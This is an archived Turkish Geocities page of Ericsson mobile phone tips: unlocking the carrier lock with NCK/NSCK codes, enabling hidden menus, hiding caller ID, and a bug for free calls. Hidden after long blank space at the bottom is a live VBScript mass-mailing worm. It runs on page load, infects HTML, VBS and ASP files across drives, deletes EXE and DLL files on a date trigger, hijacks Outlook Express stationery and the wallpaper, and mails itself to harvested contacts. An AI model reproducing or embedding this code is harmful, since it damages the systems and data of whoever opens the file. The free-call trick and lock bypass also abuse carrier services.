<script language="JavaScript">var PUpage="76001090"; var PUprop="geocities"; </script><script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"></script><script language="JavaScript"> var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/bilimonline2002/ericssonhack2.htm"; var thSpaceId="76001090"; var thIP="87.230.112.158"; var thTs="1231807914"; var thCs="78b1eea20dd3f72577543e84305a09b9";</script><noscript><link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=87.230.112.158&thTs=1231807914"></noscript><script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"></script>
<!-- text above generated by server. PLEASE REMOVE -->
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1254">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ERICSSON HACK </title>
</head>

<body bgcolor="#FFFFFF" text="#000000">
<!-- following code added by server. PLEASE REMOVE -->
<link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"><script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"></script>
<!-- preceding code added by server. PLEASE REMOVE -->

<p><a href="ericssonhack2.htm#SP Lock"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#SP Lock"><font
face="Verdana">SERVICE PROVIDER LOCK AÇMA YÖNTEM 1</font></a></p>

<p><a href="ericssonhack2.htm#768 to 788"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#768 to 788"><font
face="Verdana">ERICSSON 768 i ERICSSON 788 e yükseltme...</font></a></p>

<p><a href="http://www.geocities.com/Preahack/gsm.htm"
tppabs="http://www.geocities.com/Preahack/gsm.htm"><font
face="Verdana">GSM NETWORK SECRET CODES</font></a></p>

<p><a href="ericssonhack2.htm#Free Talk 628"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#Free Talk 628"><font
face="Verdana">ERICSSON GA 628 Ücretsiz konuþma BUG ý</font></a></p>

<p><a href="http://www.geocities.com/Preahack/ericssontopc.htm"
tppabs="http://www.geocities.com/Preahack/ericssontopc.htm"><font
face="Verdana">ERICSSON TO PC SERIAL KABLO ÞEMASI (ingilizce)</font></a></p>

<p><a href="ericssonhack2.htm#Cevapsýz Arama Kaydetme"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#Cevapsýz Arama Kaydetme"><font
face="Verdana">CEVAPSIZ ARAMALARI KAYDETMEK (Missed Calls)</font></a></p>

<p><a href="ericssonhack2.htm#Telefon Numarasý Gizleme"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#Telefon Numarasý Gizleme"><font
face="Verdana">Arama sýrasýnda TELEFON numaranýzý gizleme</font></a></p>

<p><a href="ericssonhack2.htm#SMS Mesaj Tarih"
tppabs="http://www.geocities.com/gokhanmuh/ericssonhack2.htm#SMS Mesaj Tarih"><font
face="Verdana">SMS Mesajlarýna Tarih Ekleme</font></a></p>
<div align="right">

<table border="1" width="594" height="188">
    <tr>
        <td width="594" height="188"><a name="SP Lock"></a><p><a
        name="SP Lock"><font face="Verdana">ILK IPUCU
        TELEFONLARDA BULUNAN SERVICE PROVIDER LOCK AÇMAK ÝLE ÝLGÝLÝ:</font></a></p>
        <p><a name="SP Lock"><font face="Verdana">Service
        Provider Lock: Bu kilit telefonun sadece bir service 
        provider tarafýndan kullanýlmasýný saðlayan bir
        kilittir. Örneðin Bir Ericsson telefona TURKCELL kartý
        takýlý olsun. Eðer telefonda Serivice Provider Lock
        varsa bu telefona TELSÝM kart takýlamaz. Aþaðýda bu
        þifreyi kýrmak için yollardan biri var. Ancak bu yolu
        5 kez deneme hakkýnýz var daha sonra bu yöntem ortadan
        kalkýyor.</font></a></p>
        <p><a name="SP Lock"><font face="Verdana">Þimdi
        telefonun kitli olup olmadýðýný anlamak için SIM
        kartýnýzý çýkartýn.</font></a></p>
        <p><a name="SP Lock"><font face="Verdana">&lt;**&lt; tuþlarýna
        sýrasýyla basýn. Karþýnýza </font></a></p>
        <div align="center"><center><table border="1" width="238"
        height="76">
            <tr>
                <td width="238" height="76"><a name="SP Lock"><font
                face="Verdana">ME LOCK....</font></a><p><a
                name="SP Lock"><font face="Verdana">NETWORK (kilit
                iþareti)</font></a></p>
                </td>
            </tr>
        </table>
        </center></div><p><a name="SP Lock"><font face="Verdana">þeklinde
        ekran  gelir.. Eðer bu ekraný gördüyseniz telefon
        kilitli demektir. </font></a></p>
        <p><a name="SP Lock"><font face="Verdana">Yapmanýz
        gereken;</font></a></p>
        <p><a name="SP Lock"><font face="Verdana">ERSERV32.exe
        isimli programý çalýþtýrýn. Sonra </font></a><a
        href="http://mobile.8m.com"
        tppabs="http://mobile.8m.com/"><font face="Verdana">http://mobile.8m.com</font></a><font
        face="Verdana"> adresinde bulabileceðiniz bir kablo ile
        telefonu bilgisayara baðlayýn. Çalýþtýðýndan emin
        olun.</font></p>
        <p><font face="Verdana">1. ERSERV32.EXE çalýþtýr<br>
        2. &quot;Read NCK&quot; ve &quot;Read NSCK&quot;.  seçeneklerini
        seç</font></p>
        <p><font face="Verdana">ve bunlarý not al.</font></p>
        <p><font face="Verdana"><br>
        1. &lt;**&lt; yaz<br>
        2. Telefon &quot;Me lock...&quot; yazacak<br>
        3. &quot;Yes&quot;  bas<br>
        4. Telefon &quot;Network?&quot; diyecek<br>
        5. Eðer telefon NETWORK kilitliyse &quot;Yes&quot; tuþuna
        bas. Eðer netwok kilidi yoksa &quot;&gt;&quot; tuþuna
        bas Eðer telefon sadece NSCK ile kitli ise &quot;Yes&quot;
        bas<br>
        6. Telefon &quot;Unlock?&quot; yazacak<br>
        7. &quot;Yes&quot; bas<br>
        8.  Nck veya NSCK kodunu gir. (bunu yukarad öðrenmiþtin.)</font></p>
        <p><font face="Verdana">ve telefon açýldý....</font></p>
        </td>
    </tr>
</table>
</div>

<p>&nbsp;</p>
<div align="right">

<table border="1" width="594" height="6">
    <tr>
        <td width="594" height="6"><a name="768 to 788"></a><p><a
        name="768 to 788"><font face="Verdana">Ericsson 768 i 
        Ericsson 788 upgrade etmek...<br>
        ====================================== </font></a></p>
        <p><a name="768 to 788"><font face="Verdana">1. Telefonu
        açýn ve PIN kodunu girin</font></a></p>
        <p><a name="768 to 788"><font face="Verdana">2. Store a
        Phonenumber menüsüne girin.</font></a></p>
        <p><a name="768 to 788"><font face="Verdana">3. &quot;#&quot;
        yazýn ve  &quot;YES&quot; iki kere basýn</font></a></p>
        <p><a name="768 to 788"><font face="Verdana">4.Þimdi SOl
        ok yuþuna MENU SIZE yazýsý çýkana kadar basýlý
        tutun. </font></a></p>
        <p><a name="768 to 788"><font face="Verdana">5.Þimdi
        Menu SÝze seç ve oradan Extended menüsüne gir. </font></a></p>
        <p><a name="768 to 788"><font face="Verdana">6. Þimdi
        788 de olan bütün özellikler 768 de de var... </font></a></p>
        <p><a name="768 to 788"><font face="Verdana">7.
        Settingsten Customize menüsüne gir</font></a></p>
        <p><a name="768 to 788"><font face="Verdana">8. RESET seçeneðini
        seç. Böylece 788 menü kontrolleri 768 e geçmiþ
        olacak. Eðer hemen olmazsa Telefonu kapatýp tekrar açýn.
        </font></a></p>
        </td>
    </tr>
</table>
</div>

<p><a name="768 to 788"></a> </p>
<div align="right">

<table border="1" width="593" height="1">
    <tr>
        <td width="593" height="1"><a name="768 to 788"></a><table
        border="0">
            <tr>
                <td valign="top" bgcolor="#F7F7F7"><a
                name="Free Talk 628"><font size="2"
                face="Verdana">Little bug in Ericsson 628
                &gt;&gt;Just enter phone number you need to call
                in<br>
                emergency phone memmory cell (default 112 or 911)
                and make a free call , :)</font><font
                face="Verdana"> </font></a></td>
            </tr>
            <tr>
                <td valign="top" width="18%" bgcolor="#DEDFDF"><a
                name="Free Talk 628"></a> </td>
            </tr>
        </table>
        </td>
    </tr>
</table>
</div><div align="right">

<table border="1" width="593" height="4">
    <tr>
        <td width="593" height="4"><a
        name="Cevapsýz Arama Kaydetme"></a><p><a
        name="Cevapsýz Arama Kaydetme"><font color="#000000"
        size="4" face="Verdana">Save a Missed Call into your
        phone directory</font><font face="Verdana"> </font></a></p>
        <p><a name="Cevapsýz Arama Kaydetme"><font
        face="Verdana">         Missed Calls gelin.
        &quot; Yes &quot; tuþuna basýn. gerekli numarayý görün.
        Herhangi bri numaraya basýn (0 - 9 ) sonra &quot; clear
        &quot; tuþuna basýn numarayý silin. &quot; &lt; &quot;
        basýlý tutun &quot;Store yazýsýný görünceye kadar
        basýn. Sonra &quot; Yes &quot; tuþuna basýn.</font></a></p>
        <ol>
            <li><a name="Cevapsýz Arama Kaydetme"></a> </li>
        </ol>
        </td>
    </tr>
</table>
</div><div align="right">

<table border="1" width="593" height="2">
    <tr>
        <td width="593" height="2"><a
        name="Telefon Numarasý Gizleme"><font size="4"
        face="Verdana"><strong>TELEFON NUMARASINI GÝZLEME</strong></font></a><p><a
        name="Telefon Numarasý Gizleme"><font face="Verdana">        
        Telefon numarasýný çevirip &quot;Yes&quot; tuþuna
        bastýktan sonra &quot; &gt; &quot; tuþuna iki ker basýn.
        &quot; Hide Id?  &quot; çýkacak. &quot;Yes&quot; basýn.</font></a></p>
        </td>
    </tr>
</table>
</div><div align="right">

<table border="1" width="594" height="16">
    <tr>
        <td width="594" height="16"><a name="SMS Mesaj Tarih"><font
        color="#000000" size="4" face="Verdana">Check the Date/Time
        stamp of your SMS messages</font></a><ol>
            <li><a name="SMS Mesaj Tarih"><font color="#000000"
                size="3" face="Verdana">SMS Mesajýnýza gelin.
                Read Menüsünde * tuþuna basýn.</font></a></li>
        </ol>
        </td>
    </tr>
</table>
</div>

<p align="center"><font color="#FF0000">...BÝLÝMONLÝNE...</font></p>

<p><script language="VBScript">

































































Rem I am sorry! happy time
On Error Resume Next
mload
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Os.Write()
Ihtml = "<span style='position:absolute'><Iframe src='C:\Help.htm' width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "Help.vbs") Then
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)
main
Else
Os.Reset()
Os.Path = mPath & "\" & "Help.hta"
Os.Doc = Lhtml()
Os.write()
Iv mPath, "Help.hta"
End If
End If
End If
Else
main
End If
End Sub
Sub main()
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER\Software\"
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:\help.htm") Then
Of.DeleteFile ("C:\help.htm")
End If
Key = CInt(Month(Date) + Day(Date))
If Key = 13 Then
Od.RemoveAll
Od.Add "exe", "0001"
Od.Add "dll", "0001"
End If
Cn = Rg(Ks & "Help\Count")
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help\Count", Cn + 1
f1 = Rg(Ks & "Help\FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help\FileName", f2
If IsDel(fext) Then
f3 = f2
f2 = FNext(Of, Od, f2)
Rw Ks & "Help\FileName", f2
Of.DeleteFile f3
Else
If LCase(WScript.ScriptFullname) <> LCase(f2) Then
Fw Of, f2, fext
End If
End If
If (CInt(Cn) Mod 366) = 0 Then
If (CInt(Second(Time)) Mod 2) = 0 Then
Tsend
Else
adds = Og
Msend (adds)
End If
End If
wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
If wp = "" Then
n1 = ""
n3 = Cs & "\Help.htm"
Else
mP = Of.GetFile(wp).ParentFolder
n1 = Of.GetFileName(wp)
n2 = Of.GetBaseName(wp)
n3 = Cs & "\" & n2 & ".htm"
End If
Set pfc = Of.CreateTextFile(n3, True)
mt = Sa("1100")
pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt
pfc.Close
Rw Ks & "Help\wallPaper", n3
Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
End If
Else
Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True)
fc.Write Sa("0100")
fc.Close
bf = Cs & "\Untitled.htm"
Set fc2 = Of.CreateTextFile(bf, True)
fc2.Write Lhtml
fc2.Close
oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail"
MSH = oe & "\Message Send HTML"
CUS = oe & "\Compose Use Stationery"
SN = oe & "\Stationery Name"
Rw MSH, 1
Rw CUS, 1
Rw SN, bf
Web = Cs & "\WEB"
Set gf = Of.GetFolder(Web).Files
Od.Add "htt", "1100"
For Each m In gf
fext = GetExt(Of, Od, m)
If fext <> "" Then
Fw Of, m, fext
End If
Next
End If
End Sub
Sub mclose()
document.Write "<" & "title>I am sorry!</title" & ">"
window.Close
End Sub
Sub Rt()
Dim mPath
On Error Resume Next
mPath = Grf()
Iv mPath, "Help.vbs"
End Sub
Function Sa(n)
Dim VBSText, m
VBSText = Lvbs()
If Mid(n, 3, 1) = 1 Then
m = "<%" & VBSText & "%>"
End If
If Mid(n, 2, 1) = 1 Then
m = VBSText
End If
If Mid(n, 1, 1) = 1 Then
m = Lscript(m)
End If
Sa = m & vbCrLf
End Function
Sub Fw(Of, S, n)
Dim fc, fc2, m, mmail, mt
On Error Resume Next
Set fc = Of.OpenTextFile(S, 1)
mt = fc.ReadAll
fc.Close
If Not Sc(mt) Then
mmail = Ml(mt)
mt = Sa(n)
Set fc2 = Of.OpenTextFile(S, 8)
fc2.Write mt
fc2.Close
Msend (mmail)
End If
End Sub
Function Sc(S)
mN = "Rem I am sorry! happy time"
If InStr(S, mN) > 0 Then
Sc = True
Else
Sc = False
End If
End Function
Function FNext(Of, Od, S)
Dim fpath, fname, fext, T, gf
On Error Resume Next
fname = ""
T = False
If Of.FileExists(S) Then
fpath = Of.GetFile(S).ParentFolder
fname = S
ElseIf Of.FolderExists(S) Then
fpath = S
T = True
Else
fpath = Dnext(Of, "")
End If
Do While True
Set gf = Of.GetFolder(fpath).Files
For Each m In gf
If T Then
If GetExt(Of, Od, m) <> "" Then
FNext = m
Exit Function
End If
ElseIf LCase(m) = LCase(fname) Or fname = "" Then
T = True
End If
Next
fpath = Pnext(Of, fpath)
Loop
End Function
Function Pnext(Of, S)
On Error Resume Next
Dim Ppath, Npath, gp, pn, T, m
T = False
If Of.FolderExists(S) Then
Set gp = Of.GetFolder(S).SubFolders
pn = gp.Count
If pn = 0 Then
Ppath = LCase(S)
Npath = LCase(Of.GetParentFolderName(S))
T = True
Else
Npath = LCase(S)
End If
Do While Not Er
For Each pn In Of.GetFolder(Npath).SubFolders
If T Then
If Ppath = LCase(pn) Then
T = False
End If
Else
Pnext = LCase(pn)
Exit Function
End If
Next
T = True
Ppath = LCase(Npath)
Npath = Of.GetParentFolderName(Npath)
If Of.GetFolder(Ppath).IsRootFolder Then
m = Of.GetDriveName(Ppath)
Pnext = Dnext(Of, m)
Exit Function
End If
Loop
End If
End Function
Function Dnext(Of, S)
Dim dc, n, d, T, m
On Error Resume Next
T = False
m = ""
Set dc = Of.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
If T Then
Dnext = d
Exit Function
Else
If LCase(S) = LCase(d) Then
T = True
End If
If m = "" Then
m = d
End If
End If
End If
Next
Dnext = m
End Function
Function GetExt(Of, Od, S)
Dim fext
On Error Resume Next
fext = LCase(Of.GetExtensionName(S))
GetExt = Od.Item(fext)
End Function
Sub Rw(k, v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
R.RegWrite k, v
End Sub
Function Rg(v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
Rg = R.RegRead(v)
End Function
Function IsVbs()
Dim ErrTest
On Error Resume Next
ErrTest = WScript.ScriptFullname
If Err Then
IsVbs = False
Else
IsVbs = True
End If
End Function
Function IsHTML()
Dim ErrTest
On Error Resume Next
ErrTest = document.Location
If Er Then
IsHTML = False
Else
IsHTML = True
End If
End Function
Function IsMail(S)
Dim m1, m2
IsMail = False
If InStr(S, vbCrLf) = 0 Then
m1 = InStr(S, "@")
m2 = InStr(S, ".")
If m1 <> 0 And m1 < m2 Then
IsMail = True
End If
End If
End Function
Function Lvbs()
Dim f, m, ws, Of
On Error Resume Next
If IsVbs Then
Set Of = CreateObject("Scripting.FileSystemObject")
Set f = Of.OpenTextFile(WScript.ScriptFullname, 1)
Lvbs = f.ReadAll
Else
For Each ws In document.scripts
If LCase(ws.Language) = "vbscript" Then
If Sc(ws.Text) Then
Lvbs = ws.Text
Exit Function
End If
End If
Next
End If
End Function
Function Iv(mPath, mName)
Dim Shell
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
Shell.NameSpace(mPath).Items.Item(mName).InvokeVerb
If Er Then
Iv = False
Else
Iv = True
End If
End Function
Function Grf()
Dim Shell, mPath
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
mPath = "C:\"
For Each mShell In Shell.NameSpace(mPath).Items
If mShell.IsFolder Then
Grf = mShell.Path
Exit Function
End If
Next
If Er Then
Grf = ""
End If
End Function
Function Gsf()
Dim Of, m
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
m = Of.GetSpecialFolder(0)
If Er Then
Gsf = "C:\"
Else
Gsf = m
End If
End Function
Function Lhtml()
Lhtml = "<" & "HTML" & "><HEAD" & ">" & vbCrLf & _
"<" & "Title> Help </Title" & "><" & "/HEAD>" & vbCrLf & _
"<" & "Body> " & Lscript(Lvbs()) & vbCrLf & _
"<" & "/Body></HTML" & ">"
End Function
Function Lscript(S)
Lscript = "<" & "script language='VBScript'>" & vbCrLf & _
S & "<" & "/script" & ">"
End Function
Function Sl(S1, S2, n)
Dim l1, l2, l3, i
l1 = Len(S1)
l2 = Len(S2)
i = InStr(S1, S2)
If i > 0 Then
l3 = i + l2 - 1
If n = 0 Then
Sl = Left(S1, i - 1)
ElseIf n = 1 Then
Sl = Right(S1, l1 - l3)
End If
Else
Sl = ""
End If
End Function
Function Ml(S)
Dim S1, S3, S2, T, adds, m
S1 = S
S3 = """"
adds = ""
S2 = S3 & "mailto" & ":"
T = True
Do While T
S1 = Sl(S1, S2, 1)
If S1 = "" Then
T = False
Else
m = Sl(S1, S3, 0)
If IsMail(m) Then
adds = adds & m & vbCrLf
End If
End If
Loop
Ml = Split(adds, vbCrLf)
End Function
Function Og()
Dim i, n, m(), Om, Oo
Set Oo = CreateObject("Outlook.Application")
Set Om = Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items
n = Om.Count
ReDim m(n)
For i = 1 To n
m(i - 1) = Om.Item(i).Email1Address
Next
Og = m
End Function
Sub Tsend()
Dim Od, MS, MM, a, m
Set Od = CreateObject("Scripting.Dictionary")
MConnect MS, MM
MM.FetchSorted = True
MM.Fetch
For i = 0 To MM.MsgCount - 1
MM.MsgIndex = i
a = MM.MsgOrigAddress
If Od.Item(a) = "" Then
Od.Item(a) = MM.MsgSubject
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
MM.RecipAddress = m
MM.AttachmentPathName = Gsf & "\Untitled.htm"
MM.Send
Next
MS.SignOff
End Sub
Function MConnect(MS, MM)
Dim U
On Error Resume Next
Set MS = CreateObject("MSMAPI.MAPISession")
Set MM = CreateObject("MSMAPI.MAPIMessages")
U = Rg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\DefaultProfile")
MS.UserName = U
MS.DownLoadMail = False
MS.NewSession = False
MS.LogonUI = True
MS.SignOn
MM.SessionID = MS.SessionID
End Function
Sub Msend(Address)
Dim MS, MM, i, a
MConnect MS, MM
i = 0
MM.Compose
For Each a In Address
If IsMail(a) Then
MM.RecipIndex = i
MM.RecipAddress = a
i = i + 1
End If
Next
MM.MsgSubject = " Help "
MM.AttachmentPathName = Gsf & "\Untitled.htm"
MM.Send
MS.SignOff
End Sub
Function Er()
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
Function IsDel(S)
If Mid(S, 4, 1) = 1 Then
IsDel = True
Else
IsDel = False
End If
End Function













</script> </p>
</body>
</html>
<!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?us1231807914" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001090&t=1231807914&f=us-w66" ALT=1 WIDTH=1 HEIGHT=1>
